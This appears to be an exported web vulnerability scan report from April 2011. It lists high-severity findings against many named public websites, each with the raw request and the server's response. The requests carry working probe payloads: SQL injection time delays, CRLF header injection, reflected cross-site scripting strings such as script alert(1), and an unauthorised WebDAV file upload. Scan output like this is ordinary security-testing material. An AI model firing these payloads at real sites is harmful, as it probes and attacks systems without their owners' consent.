HTTP/1.1 200 OK Set-Cookie: Z=YOYLQIS74.205.26 Date: Sat, 02 Apr 2011 13:42:41 GMT Server: Apache Set-Cookie: a=newwindow+1+dpcollation Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 52097 <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title ...[SNIP]... 020039722EE73D3D91B9 ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.cartoonnetwork |
Path: | /favicon.ico |
GET /favicon.ico' HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.cartoonnetwork.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:45:44 GMT Server: Apache Cache-Control: private Content-Type: text/html Vary: User-Agent,Accept Content-Length: 29979 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js"> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.ning.com |
Path: | /favicon.ico |
GET /favicon.ico' HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.ning.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 301 Moved Permanently X-XN-Trace-Token: 035d4f9a-70d6-4175-ab94 Server: Ning HTTP Server 2.0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: xn_visitor=2888191c-8dd6 Set-Cookie: ning_session="nVdNOs XN-ResponseFrom: 10.16.47.166,(10.16.106 Date: Sat, 02 Apr 2011 13:26:00 GMT Set-Cookie: P=a%3A2%3A%7Bs%3A6%3A Location: http://www.ning.com/ Content-Type: text/html; charset=utf-8 Content-Length: 19093 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <script>xp_subscribe( ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.thefind.com |
Path: | /favicon.ico |
GET /favicon.ico'waitfor%20delay'0%3a0 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.thefind.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 12:44:13 GMT Server: Apache Set-Cookie: flsid=899145ae9fb41c Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 31 Mar 2011 05:45:51 GMT Set-Cookie: fl-uid=03f6276b0fa29 Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 78472 Content-Type: text/html; charset=utf-8 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>TheFind - Shopped & Found</title> <script type="text/javascri ...[SNIP]... <script type="text/javascript" src="//cdn.thefind.com ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.wwe.com |
Path: | /favicon.ico |
GET /favicon.ico' HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.wwe.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache/2.2.17 Last-Modified: Fri, 01 Apr 2011 16:47:30 +0000 Vary: Cookie ETag: "1301676450" X-App: p5tyr3 Content-Type: text/html; charset=utf-8 X-Varnish: 1587144406 1587143361 X-CacheTyr-Server: p5tyr3 X-CacheTyr: HIT X-CacheTyr-Hits: 1 X-Cacheable: NO: beresp.status 1 X-Cacheable-status: 404 Content-Length: 53517 X-Varnish: 979578143 959694108 X-CacheKyte-Server: p5kyte7 X-CacheKyte: HIT X-CacheKyte-Hits: 1002095 Vary: Accept-Encoding Cache-Control: public, must-revalidate, max-age=11294 Date: Sat, 02 Apr 2011 13:39:46 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equi ...[SNIP]... jQuery.extend(Drupal ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://activresa-secure2 |
Path: | / |
PUT /9a847644e2391b55.txt HTTP/1.0 Host: activresa-secure2.icor.fr Content-Length: 16 facafbdd945895ba |
HTTP/1.1 201 Created Connection: close Date: Sat, 02 Apr 2011 12:48:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: https://activresa-secure2 Content-Length: 0 Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK |
GET /9a847644e2391b55.txt HTTP/1.0 Host: activresa-secure2.icor.fr |
HTTP/1.1 200 OK Cache-Control: max-age=60 Content-Length: 16 Content-Type: text/plain Last-Modified: Sat, 02 Apr 2011 12:48:23 GMT Accept-Ranges: bytes ETag: W/"5222c64034f1cb1:3765" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 12:48:23 GMT Connection: close facafbdd945895ba |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ew.com |
Path: | /favicon.ico |
GET /7805c%0d%0aa049615f928 HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.ew.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 301 Moved Permanently Date: Sat, 02 Apr 2011 13:32:14 GMT Location: http://www.ew.com/ew/7805c a049615f928 Vary: Accept-Encoding Content-Length: 307 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.ew.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.familyedu |
Path: | /favicon.ico |
GET /favicon.ico2afbc%0d%0a10ac4b7e696 HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.familyeducation.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 302 Redirect Server: Microsoft-IIS/5.0 Date: Sat, 02 Apr 2011 13:57:17 GMT Location: /defaultpage.htm?/favicon 10ac4b7e696 |
Severity: | High |
Confidence: | Certain |
Host: | http://www.health.com |
Path: | /favicon.ico |
GET /a5cc2%0d%0a808e9ba22de HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.health.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 301 Moved Permanently Date: Sat, 02 Apr 2011 13:35:15 GMT Location: http://www.health.com 808e9ba22de Vary: Accept-Encoding Content-Length: 319 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.health ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.homestead.com |
Path: | /favicon.ico |
GET /a31ef%0d%0ac36e0392523 HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.homestead.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 302 Moved Temporarily Server: Microsoft-IIS/5.0 Date: Sat, 02 Apr 2011 13:35:09 GMT Location: /a31ef c36e0392523/ |
Severity: | High |
Confidence: | Certain |
Host: | http://www.instyle.com |
Path: | /favicon.ico |
GET /b65da%0d%0aa9cfd0405fc HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.instyle.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 301 Moved Permanently Date: Sat, 02 Apr 2011 14:04:58 GMT Location: http://www.instyle.com a9cfd0405fc Vary: Accept-Encoding Content-Length: 322 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.instyle ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.livingsocial |
Path: | /favicon.ico |
GET /a8e30%0d%0ab8e0c5a066b HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.livingsocial.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 301 Moved Permanently Server: nginx Date: Sat, 02 Apr 2011 13:38:58 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: http://livingsocial.com/a8e30 b8e0c5a066b <html> <head><title>301 Moved Permanently</title></head <body bgcolor="white"> <center><h1>301 Moved Permanently</h1></center> <hr><center>nginx</center </body> </html> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.people.com |
Path: | /favicon.ico |
GET /fade4%0d%0a04e193106f1 HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.people.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 301 Moved Permanently Date: Sat, 02 Apr 2011 12:43:26 GMT Location: http://www.people.com 04e193106f1 Vary: Accept-Encoding Content-Length: 319 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.people ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.peoplesty |
Path: | /favicon.ico |
GET /894db%0d%0ab895b7fee0e HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.peoplestylewatch.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 301 Moved Permanently Date: Sat, 02 Apr 2011 13:56:32 GMT Location: http://www.people.com/894db b895b7fee0e Vary: Accept-Encoding Content-Length: 322 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.people ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.salesforce.com |
Path: | /favicon.ico |
GET /7f0d3%0d%0a3d52478bda4 HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.salesforce.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 301 Moved Permanently Server: SFDC Location: /7f0d3 3d52478bda4/ Date: Sat, 02 Apr 2011 13:46:30 GMT Content-Length: 77 The URL has moved to <a href="/7f0d3 3d52478bda4/">/7f0d3 3d52478bda4/</a> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.shop.com |
Path: | /favicon.ico |
GET /favicon.ico?e81a0%0d%0a052c3a9c4af=1 HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.shop.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 302 URL Redirect Server: AMOS/1.0 Date: Sat, 02 Apr 2011 13:41:32 GMT Content-Type: text/html Content-Length: 301 Location: http://edge.shop.com 052c3a9c4af=1 Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache <html><head><title <META URL=http://edge.shop.com 052c3a9c4af=1"> </head> <body><h1>Object Moved</h1>This document may be found <a href= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.shopcompanion |
Path: | /favicon.ico |
GET /favicon.ico?3f544%0d%0a18f859d78f2=1 HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.shopcompanion.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 302 URL Redirect Server: AMOS/1.0 Date: Sat, 02 Apr 2011 14:00:40 GMT Content-Type: text/html Content-Length: 301 Location: http://edge.shop.com 18f859d78f2=1 Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache <html><head><title <META URL=http://edge.shop.com 18f859d78f2=1"> </head> <body><h1>Object Moved</h1>This document may be found <a href= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.tbo.com |
Path: | /favicon.ico |
GET /fefb7%0d%0ad3916ee3b78 HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.tbo.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 301 Moved Permanently Server: nginx/0.6.32 Date: Sat, 02 Apr 2011 13:59:19 GMT Content-Type: text/html Content-Length: 185 Connection: keep-alive Location: http://www2.tbo.com/fefb7 d3916ee3b78 Server-Name: media2 <html> <head><title>301 Moved Permanently</title></head <body bgcolor="white"> <center><h1>301 Moved Permanently</h1></center> <hr><center>nginx/0.6.32< </body> </html> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.thisoldhouse |
Path: | /favicon.ico |
GET /ff592%0d%0afdec1d1094 HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.thisoldhouse.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 301 Moved Permanently Date: Sat, 02 Apr 2011 14:13:11 GMT Location: http://www.thisoldhouse fdec1d1094 Vary: Accept-Encoding Content-Length: 327 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.wn.com |
Path: | /favicon.ico |
GET /aa6b8%0d%0a651e1e31954 HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.wn.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 301 Moved Permanently Date: Sat, 02 Apr 2011 13:39:56 GMT Server: Apache/2.2.16 (Debian) Location: http://wn.com/aa6b8 651e1e31954 Vary: Accept-Encoding Content-Length: 316 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://wn.com/aa6b8 65 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.youravon.com |
Path: | /favicon.ico |
GET /3419d%0d%0a6094b152882 HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.youravon.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 302 Found Date: Sat, 02 Apr 2011 13:37:45 GMT Server: IBM_HTTP_Server Location: http://3419d 6094b152882.avonrepresentative.com/ Content-Length: 301 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://3419d 6094b152882.avonrepr ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N1260.Google.com |
GET /adi/N1260.Google.com Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=46b610ae08 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7224 Cache-Control: no-cache Pragma: no-cache Date: Sat, 02 Apr 2011 13:00:26 GMT Expires: Sat, 02 Apr 2011 13:00:26 GMT <html><head><title ...[SNIP]... XBlYy04Ni1kb3JrLXhzc var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N1260.Google.com |
GET /adi/N1260.Google.com Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=46b610ae08 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sat, 02 Apr 2011 12:57:47 GMT Vary: Accept-Encoding Expires: Sat, 02 Apr 2011 12:57:47 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7244 <html><head><title ...[SNIP]... HN19niA7IBBnhzcy5jeL var fscUrl = url; var fscU ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N1260.Google.com |
GET /adi/N1260.Google.com Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=46b610ae08 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sat, 02 Apr 2011 12:59:52 GMT Vary: Accept-Encoding Expires: Sat, 02 Apr 2011 12:59:52 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7244 <html><head><title ...[SNIP]... RtbC9jYXBlYy04Ni1kb3 var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowsc ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N1260.Google.com |
GET /adi/N1260.Google.com Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=46b610ae08 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sat, 02 Apr 2011 12:58:24 GMT Vary: Accept-Encoding Expires: Sat, 02 Apr 2011 12:58:24 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7261 <html><head><title ...[SNIP]... A7IBBnhzcy5jeLoBCTcy var fscUrl = url; var fsc ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N1260.Google.com |
GET /adi/N1260.Google.com Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=46b610ae08 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sat, 02 Apr 2011 12:59:10 GMT Vary: Accept-Encoding Expires: Sat, 02 Apr 2011 12:59:10 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7244 <html><head><title ...[SNIP]... 0dHA6Ly94c3MuY3gvZXh var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N1260.Google.com |
GET /adi/N1260.Google.com Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=46b610ae08 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sat, 02 Apr 2011 12:57:17 GMT Vary: Accept-Encoding Expires: Sat, 02 Apr 2011 12:57:17 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7244 <html><head><title ...[SNIP]... l = escape("http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.4shared.com |
Path: | /favicon.ico |
GET /favicon.ico3f45e'-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.4shared.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 /favicon.ico3f45e'-alert Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=1459F926D Content-Type: text/html;charset=UTF-8 Date: Sat, 02 Apr 2011 13:25:12 GMT Content-Length: 41850 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... eof loginBox == 'undefined'){ $('#loginBoxDiv').load(' { login : '', password : '', fpRedirParam : 'http://www.4shared.com remember : false }, function(){ showLoginBox(); } ); }else{ showLoginBox(); } } function ens ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.4shared.com |
Path: | /favicon.ico |
GET /favicon.ico15164"-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.4shared.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 /favicon.ico15164" Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=61CB2DAE3 Content-Type: text/html;charset=UTF-8 Date: Sat, 02 Apr 2011 13:25:11 GMT Content-Length: 41151 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink OpenWindow = window.open(url OpenWindow.focus(); } function feedback() { var wind ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.aboutus.org |
Path: | /favicon.ico |
GET /favicon.icod2e07"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.aboutus.org Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Connection: close Status: 200 X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.1 ETag: "64d7e41dd2260249cad X-Runtime: 121 Content-Length: 13392 Set-Cookie: logged_in=false; path=/ Set-Cookie: _aboutus_session_key Cache-Control: max-age=0, public X-Au-Rails-Sha1: 65ba32a Server: nginx/0.8.54 + Phusion Passenger 3.0.1 (mod_rails/mod_rack) X-node-id: rogue Set-Cookie: SERVERID=rogue; path=/ <!doctype html> <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="description" content="Favicon.Icod2e07"><Script>Alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.allbusiness |
Path: | /favicon.ico |
GET /e888a"-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.allbusiness.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 The page you requested could not be found. Date: Sat, 02 Apr 2011 13:38:49 GMT Server: Apache Set-Cookie: JSESSIONID=2a30daa2c Set-Cookie: SERVERID=web6;path=/ Set-Cookie: IIA=%2D3;expires=Sun, 03-Apr-2011 13:38:49 GMT;path=/ Set-Cookie: IIA=%2D2;expires=Sun, 03-Apr-2011 13:38:49 GMT;path=/ Set-Cookie: PAGEID=594366435;path=/ Set-Cookie: TS=2011%2D04%2D02%2008 Set-Cookie: COMPONENTID=0;expires=Mon Cache-Control: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 47445 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content ...[SNIP]... ot found, but..."; s_ab.prop10 = "3471360"; s_ab.prop11 = ""; s_ab.prop12 = "landingpageobject"; s_ab.prop13 = "AllBusiness.com"; s_ab.prop14 = ""; s_ab.prop15 = "www.allbusiness.com/e888a"-alert(1)- s_ab.prop16 = ""; s_ab.prop17 = ""; s_ab.prop18 = ""; s_ab.prop19 = ""; s_ab.prop20 = ""; s_ab.prop21 = ""; s_ab.prop22 = ""; s_ab.prop23 = ""; s_ab.prop24 = ""; s_ab.p ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.allbusiness |
Path: | /favicon.ico |
GET /c535f"><img%20src%3da User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.allbusiness.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 The page you requested could not be found. Date: Sat, 02 Apr 2011 13:38:47 GMT Server: Apache Set-Cookie: JSESSIONID=ac30c795c Set-Cookie: SERVERID=web7;path=/ Set-Cookie: IIA=%2D3;expires=Sun, 03-Apr-2011 13:38:47 GMT;path=/ Set-Cookie: IIA=%2D2;expires=Sun, 03-Apr-2011 13:38:47 GMT;path=/ Set-Cookie: PAGEID=594366418;path=/ Set-Cookie: TS=2011%2D04%2D02%2008 Set-Cookie: COMPONENTID=0;expires=Mon Cache-Control: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 47481 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content ...[SNIP]... <form method="post" id="formWrapper_1" name="formWrapper_1" action="https://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.allvoices.com |
Path: | /favicon.ico |
GET /favicon.icoe5dd6"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.allvoices.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:33:36 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5 X-QueryCount: 2 X-Runtime: 17ms X-QueryRuntime: 0.00090 Cache-Control: no-cache Set-Cookie: _T_=c2xmzossd34irl5o Set-Cookie: page_url=http%3A%2F%2Fwww Set-Cookie: masala_session_id Content-Length: 27741 Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <meta property="og:url" content="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.answerbag.com |
Path: | /favicon.ico |
GET /favicon.ico1dcf8'><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.answerbag.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.0 404 Not Found Date: Sat, 02 Apr 2011 13:24:23 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a PHP/5.2.5 X-Powered-By: PHP/5.2.5 Set-Cookie: PHPSESSID=37e025c3a2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en-us <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns:fb="http://www ...[SNIP]... <meta property='og:url' content='http://www ...[SNIP]... |
